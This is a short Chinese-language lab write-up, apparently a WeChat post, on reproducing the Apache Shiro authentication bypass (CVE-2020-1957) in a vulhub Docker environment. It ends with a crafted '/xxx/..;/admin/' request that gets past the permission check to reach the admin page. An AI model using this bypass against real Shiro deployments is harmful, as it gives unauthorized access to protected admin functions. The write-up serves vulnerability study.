本公众号所发布的文章及工具只限交流学习,本公众号不承担任何责任!如有侵权,请告知我们立即删除。
Apache Shiro 认证绕过漏洞(CVE-2020-1957)
Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。
在Apache Shiro 1.5.2以前的版本中,在使用Spring动态控制器时,攻击者通过构造`..;`这样的跳转,可以绕过Shiro中对目录的权限限制。
进入到vulbub靶场的/vulhub/shiro/cve-2022-1957目录
使用命令:
docker-compose up -d #启动镜像,整个过程比较久,耐心等待
环境搭建完毕,访问http://192.168.0.140:8080/,得到如下页面
1、访问直接请求管理页面http://192.168.0.140:8080/admin/,无法访问,将会被重定向到登录页面:
2、构造恶意请求http://192.168.0.140:8080/xxx/..;/admin/,即可绕过权限校验,访问到管理页面: